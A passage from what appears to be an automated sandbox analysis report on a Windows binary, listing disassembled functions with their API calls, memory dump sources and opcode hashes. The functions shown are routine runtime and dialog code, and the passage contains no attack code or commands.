                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: 9457bb7c77629bfbe4ec0d30b60a534d18e0e51e46b88a39096f6fe0b228547e
                  • Instruction ID: 4c18557adcadce408116116e67fab51e1de5ffc23c99ac0d1086a490cd4c7e14
                  • Opcode Fuzzy Hash: 9457bb7c77629bfbe4ec0d30b60a534d18e0e51e46b88a39096f6fe0b228547e
                  • Instruction Fuzzy Hash: ED31D87A90020DEBCB00DFE5C8859EFBBB8FF58710B04455AE955E3210EB309645DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F491B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: dce8e0079e93f3745af27bfb76a9e9cbb4b6e64a4fb228e905691698ca24b39a
                  • Instruction ID: c741bf1a7b4d8c1e1859650b0a0afc07ae9e9840718c8100801d05eaa4dbb4d5
                  • Opcode Fuzzy Hash: dce8e0079e93f3745af27bfb76a9e9cbb4b6e64a4fb228e905691698ca24b39a
                  • Instruction Fuzzy Hash: 1E216771B0810E7BD7059E14CC42F6B7BAD9B50B54F148525FC0997301F6F4DE4576A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F58FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,00F70EE8,00F53E14,00F70EE8,?,?,00F53713,00000050,?,00F70EE8,00000200), ref: 00F58FA9
                  • _free.LIBCMT ref: 00F58FDC
                  • _free.LIBCMT ref: 00F59004
                  • SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F59011
                  • SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F5901D
                  • _abort.LIBCMT ref: 00F59023
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 84c76f74efef15f3aef34cb3646fcb948473de92b221dd840ee4312a4aaa66cf
                  • Instruction ID: 114926da033cdf4266a4afc09f7c016365926b578fe6a3be49c63302279f1fe9
                  • Opcode Fuzzy Hash: 84c76f74efef15f3aef34cb3646fcb948473de92b221dd840ee4312a4aaa66cf
                  • Instruction Fuzzy Hash: E7F0F936909501BAC61173386C06B2B39555BD57B7F240114FF26F2192EF64C90F7151
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F4D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4D31D
                  • TranslateMessage.USER32(?), ref: 00F4D327
                  • DispatchMessageW.USER32(?), ref: 00F4D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F4D33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: de564980f520ad445ac8568fcca608db077d33a1f7451f1ac5dedc7bc2ef1a31
                  • Instruction ID: c694b5b96f05d3ee1d0184d21451d3b49a7aed73e7fbf500d549a5e1451c54cb
                  • Opcode Fuzzy Hash: de564980f520ad445ac8568fcca608db077d33a1f7451f1ac5dedc7bc2ef1a31
                  • Instruction Fuzzy Hash: 94F03C72E0111DBBCB215FA1DC4CEEBBF6DEF513A1F008012FA06D2020D6348555D7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 00F4C435
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 519a7004ebbe6b82b2f5d3dce0b6dea1d20abbe0aa6e690475d34cd26df803f6
                  • Instruction ID: 54684176a40c61a21efcb09f0062eb96998baef22c40be5f92190c5c8bf5732a
                  • Opcode Fuzzy Hash: 519a7004ebbe6b82b2f5d3dce0b6dea1d20abbe0aa6e690475d34cd26df803f6
                  • Instruction Fuzzy Hash: CC318372D00209AADB61DA94CC51FEA7BBCEB54710F004066FE05E6091EBB59EC4DA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 00F4ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4AE22
                  • DeleteObject.GDI32(00000000), ref: 00F4AE54
                  • DeleteObject.GDI32(00000000), ref: 00F4AE77
                    • Part of subcall function 00F49E1C: FindResourceW.KERNEL32(00F4AE4D,PNG,?,?,?,00F4AE4D,00000066), ref: 00F49E2E
                    • Part of subcall function 00F49E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E46
                    • Part of subcall function 00F49E1C: LoadResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E59
                    • Part of subcall function 00F49E1C: LockResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: b81b428bc4410be04111bb5e787ab72119aca9b56a93eb4710ffe05bcb508f5b
                  • Instruction ID: e2b922a8788389ec5b70cb4bae10640f9ddad276f74e084ed94112bf9de1a5f8
                  • Opcode Fuzzy Hash: b81b428bc4410be04111bb5e787ab72119aca9b56a93eb4710ffe05bcb508f5b
                  • Instruction Fuzzy Hash: CE012632A80219A7D71067659C06A7F7F79AF81B61F080115FD10A72A1DF758C15B2B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4CCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F4CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F4CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 00F4CD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 4086fdaf7d2764b15dec3e2c0d3747ee8e71eb828ad53d039ddd675bc16946bb
                  • Instruction ID: 78d087cfb264da48a1c145d0150a7cafa8fc3681a8095cccd84c20282e513542
                  • Opcode Fuzzy Hash: 4086fdaf7d2764b15dec3e2c0d3747ee8e71eb828ad53d039ddd675bc16946bb
                  • Instruction Fuzzy Hash: 48012833B862157ED5914F64AC49FAB3F6CEB9AB12F100411F746A20E0C6615904F7E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F575C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F57573,00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002), ref: 00F575E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F575F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00F57573,00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002), ref: 00F57618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 9b8ffb7f63a90e0e45ef2bf84c13afabe96cfef46b661194de83381bda70825e
                  • Instruction ID: 8756b12dec4d7c5d162e05e69adf24dda62278e249c596812510534c868378b0
                  • Opcode Fuzzy Hash: 9b8ffb7f63a90e0e45ef2bf84c13afabe96cfef46b661194de83381bda70825e
                  • Instruction Fuzzy Hash: 23F0AF30A0861CBBCB11AB94DC09B9DBFB8EF04726F000068F805A2160DB709A48FA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F3EB92
                  • GetProcAddress.KERNEL32(00F781C0,CryptUnprotectMemory), ref: 00F3EBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: a7aff7689bf200c4a3a90be3e4a4159cb5141312f38fb4ac7f956c673f29272e
                  • Instruction ID: 08e5d104fe17ae8506cfaacf34808d86502e4108408660b8ce03ecb2b931eb0c
                  • Opcode Fuzzy Hash: a7aff7689bf200c4a3a90be3e4a4159cb5141312f38fb4ac7f956c673f29272e
                  • Instruction Fuzzy Hash: 7EE04670D00741AECB219F389808B42FEE56F14724F04881DE4E6E3280DAF4D584AF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F57DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: c0b88439a1598ac369b7f0e854af657cd748edd6f6654a3ab797582fd6280d80
                  • Instruction ID: 04dc7d052695bfc633f4fbded5b0269faed26a0ff0064d62967ed06787fcd920
                  • Opcode Fuzzy Hash: c0b88439a1598ac369b7f0e854af657cd748edd6f6654a3ab797582fd6280d80
                  • Instruction Fuzzy Hash: CE41D236E003049FCB20EF78D881A5EB7E5EF85724F1545A8EA15EB251DB31AD05EB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00F5B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5B63C
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5B662
                  • _free.LIBCMT ref: 00F5B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5B684
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 00282a67ecb98b4af59a62cf8a33330143d5a34dd8e0b76156b17b61a734addb
                  • Instruction ID: d2680da6c3dd4399457d87dd0f2df1d616d62c5f2bbf674a4385231e2f38ccc8
                  • Opcode Fuzzy Hash: 00282a67ecb98b4af59a62cf8a33330143d5a34dd8e0b76156b17b61a734addb
                  • Instruction Fuzzy Hash: 4E01D472A01215BF632116766C9DC7B7A6DDEC7BB23150268FE04D3510EFA0CD06B1B0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F59029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,00F70EE8,00000200,00F5895F,00F558FE,?,?,?,?,00F3D25E,?,032B3D70,00000063,00000004,00F3CFE0,?), ref: 00F5902E
                  • _free.LIBCMT ref: 00F59063
                  • _free.LIBCMT ref: 00F5908A
                  • SetLastError.KERNEL32(00000000,00F63958,00000050,00F70EE8), ref: 00F59097
                  • SetLastError.KERNEL32(00000000,00F63958,00000050,00F70EE8), ref: 00F590A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: d80c3abbc9f10e64e2b5701f6b675a0e699f08dd3abf376473b37e992220dacd
                  • Instruction ID: c315bbd57a6f33bab01e3570c53a31b95f3c4e84502397cecd3a2e546637eeb0
                  • Opcode Fuzzy Hash: d80c3abbc9f10e64e2b5701f6b675a0e699f08dd3abf376473b37e992220dacd
                  • Instruction Fuzzy Hash: C801F937A09A00BBC3266774AC85A2B365D9BD13B77240524FF26A31D1EFE8CC0E7150
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F40A41: ResetEvent.KERNEL32(?), ref: 00F40A53
                    • Part of subcall function 00F40A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F40A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F4078F
                  • CloseHandle.KERNEL32(?,?), ref: 00F407A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 00F407C2
                  • CloseHandle.KERNEL32(?), ref: 00F407CE
                  • CloseHandle.KERNEL32(?), ref: 00F407DA
                    • Part of subcall function 00F4084E: WaitForSingleObject.KERNEL32(?,000000FF,00F40A78,?), ref: 00F40854
                    • Part of subcall function 00F4084E: GetLastError.KERNEL32(?), ref: 00F40860
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: 02f95810e78dcbfe8429ece74ddab4a5af466b13fe9afe73de728d548563d4bd
                  • Instruction ID: 5160134342bd2bacc9cfe125c432ad33435d75946e12f2cd8ca15b25116bb1f1
                  • Opcode Fuzzy Hash: 02f95810e78dcbfe8429ece74ddab4a5af466b13fe9afe73de728d548563d4bd
                  • Instruction Fuzzy Hash: 7A01B571440708FFC7219B65DD84FC6BBF9FB48710F000529F66A42160CBB56A48EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00F5BF28
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5BF3A
                  • _free.LIBCMT ref: 00F5BF4C
                  • _free.LIBCMT ref: 00F5BF5E
                  • _free.LIBCMT ref: 00F5BF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d007877089213c5002147491f27180e0edef39039d5f6bea2c677446a75fcd6a
                  • Instruction ID: dd04a8693ae296890fdb467e0cd0a0ccb886a5e4ee4f532f073c102240789b85
                  • Opcode Fuzzy Hash: d007877089213c5002147491f27180e0edef39039d5f6bea2c677446a75fcd6a
                  • Instruction Fuzzy Hash: 07F01237909205A7C620EBA4EE86C1B73D9BA007A17648805FE59E7D50CB74FC8AAA54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F58060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00F5807E
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
